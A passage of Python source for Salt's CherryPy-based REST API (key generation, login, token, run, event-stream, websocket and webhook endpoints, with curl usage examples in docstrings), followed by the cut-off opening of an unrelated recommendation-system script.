.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: text
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
@cherrypy.config(**{'tools.hypermedia_out.on': False, 'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>`.
.. note:: A note about ``curl``
Avoid using the ``-i`` flag or HTTP headers will be written and
produce an invalid tar file.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: text
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
lowstate = cherrypy.request.lowstate
lowstate[0].update({
'client': 'wheel',
'fun': 'key.gen_accept',
})
if 'mid' in lowstate[0]:
lowstate[0]['id_'] = lowstate[0].pop('mid')
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = BytesIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
if six.PY3:
pub_key = pub_key.encode(__salt_system_encoding__)
priv_key = priv_key.encode(__salt_system_encoding__)
tarball.addfile(pub_key_file, BytesIO(pub_key))
tarball.addfile(priv_key_file, BytesIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(lowstate[0]['id_'])
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = len(fileobj.getvalue())
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: text
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning(
'Salt Master is not available.')
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get('username', None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
if token['eauth'] == 'django' and '^model' in eauth:
perms = token['auth_list']
else:
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token['name'], [])
perms.extend(eauth.get('*', []))
if 'groups' in token and token['groups']:
user_groups = set(token['groups'])
eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])
for group in user_groups & eauth_groups:
perms.extend(eauth['{0}%'.format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception:
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
perms = None
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms or {},
}]}
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Token(LowDataAdapter):
'''
Generate a Salt token from eauth credentials
Wraps functionality in the :py:mod:`auth Runner <salt.runners.auth>`.
.. versionadded:: 2017.7.0
'''
@cherrypy.config(**{'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
.. http:post:: /token
Generate a Salt eauth token
:status 200: |200|
:status 400: |400|
:status 401: |401|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/token \
-H 'Content-type: application/json' \
-d '{
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}'
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
[{
"start": 1494987445.528182,
"token": "e72ca1655d05...",
"expire": 1495030645.528183,
"name": "saltdev",
"eauth": "auto"
}]
'''
for creds in cherrypy.request.lowstate:
try:
creds.update({
'client': 'runner',
'fun': 'auth.mk_token',
'kwarg': {
'username': creds['username'],
'password': creds['password'],
'eauth': creds['eauth'],
},
})
except KeyError:
raise cherrypy.HTTPError(400,
'Require "username", "password", and "eauth" params')
return list(self.exec_lowstate())
class Run(LowDataAdapter):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
salt-api does not enforce authorization, Salt's eauth system does that.
Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
**or** ``token`` kwargs that are then checked by the eauth system. The
session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
eauth token and then passes the ``token`` kwarg in automatically.
If you already have a Salt eauth token, perhaps generated by the
:py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
Runner module, then there is no reason to use sessions.
This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
**or** a ``token`` kwarg and does not make use of sessions at all.
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>` Other than that this URL is identical to the
:py:meth:`root URL (/) <LowDataAdapter.POST>`.
.. http:post:: /run
An array of lowstate data describing Salt commands must be sent in
the request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
**Or** using a Salt Eauth token:
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"token": "<salt eauth token here>"
}]'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run enpoint can also be used to issue commands using the salt-ssh
subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instead,
authentication should be handled by the SSH layer itself. The use of
the salt-ssh client does not require a salt master to be running.
Instead, only a roster file must be present in the salt configuration
directory.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: text
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
# Make sure that auth token is hex. If it's None, or something other
# than hex, this will raise a ValueError.
try:
int(auth_token, 16)
except (TypeError, ValueError):
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get('token', auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: text
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialze the
JSON object each time.
.. code-block:: text
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
Note, the SSE stream is fast and completely asynchronous and Salt is
very fast. If a job is created using a regular POST request, it is
possible that the job return will be available on the SSE stream before
the response for the POST request arrives. It is important to take that
asynchronicity into account when designing an application. Below are
some general guidelines.
* Subscribe to the SSE stream _before_ creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
* Be cautious in writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
A full, working proof-of-concept JavaScript application is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
yield str('retry: 400\n') # future lint: disable=blacklisted-function
while True:
data = next(stream)
yield str('tag: {0}\n').format(data.get('tag', '')) # future lint: disable=blacklisted-function
yield str('data: {0}\n\n').format(salt.utils.json.dumps(data)) # future lint: disable=blacklisted-function
return listen()
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: text
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: text
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
Above examples show how to establish a websocket connection to Salt and
activating real time updates from Salt's event stream by signaling
``websocket client ready``.
'''
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
def signal_handler(signal, frame):
os._exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send(
str('data: {0}\n\n').format(salt.utils.json.dumps(data)), # future lint: disable=blacklisted-function
False
)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle asynchronous push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor <reactor>`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: text
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: jinja
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, 'raw_body', '')
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def __init__(self):
if cherrypy.config['apiopts'].get('stats_disable_auth'):
self._cp_config['tools.salt_auth.on'] = False
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
default_index = os.path.abspath(os.path.join(
os.path.dirname(__file__), 'index.html'))
return cherrypy.lib.static.serve_file(
apiopts.get('app', default_index))
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'token': Token,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
if self.apiopts.get('enable_sessions', True) is False:
url_blacklist = ['login', 'logout', 'minions', 'jobs']
else:
url_blacklist = []
urls = ((url, cls) for url, cls in six.iteritems(self.url_map)
if url not in url_blacklist)
for url, cls in urls:
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
'log.access_file': self.apiopts.get('log_access_file', ''),
'log.error_file': self.apiopts.get('log_error_file', ''),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.html_override.on': True,
'tools.cors_tool.on': True,
},
}
if salt.utils.versions.version_cmp(cherrypy.__version__, '12.0.0') < 0:
# CherryPy >= 12.0 no longer supports "timeout_monitor", only set
# this config option when using an older version of CherryPy.
# See Issue #44601 for more information.
conf['global']['engine.timeout_monitor.on'] = self.apiopts.get(
'expire_responses', True
)
if cpstats and self.apiopts.get('collect_stats', False):
conf['/']['tools.cpstats.on'] = True
if 'favicon' in self.apiopts:
conf['/favicon.ico'] = {
'tools.staticfile.on': True,
'tools.staticfile.filename': self.apiopts['favicon'],
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
recommendationSystem.py
|
import cloudserver
from threading import Thread
import time
import datetime
import numpy as np
import cvxopt
from cvxopt import glpk
import random
from spaceNames import S
from spaceNames import NS
from spaceNames import realS
from personal import P
from personal import PO
from IDs import Jgroup
from IDs import Tgroup
from IDs import Bgroup
import numpy as npn
import tensorflow as tensf
import math
import requests
import json
class recommenderSystem:
def __init__(self):
self.initState()
self.setup()
self.startDaemon()
def initState(self):
self.footprints = {}
self.personal = {}
self.spaceDef = {}
self.nonSpaceDef = {}
self.realSDef = {}
self.spaces = S
self.nonSpaces = NS
self.realS = realS
self.timeout = {}
print("Found " + str(len(self.spaces)) + " spaces")
self.personalDevices = P
self.owners = PO
self.peopleID = Jgroup+Bgroup+Tgroup
i = 0
for room in self.spaces:
if (i == 0):
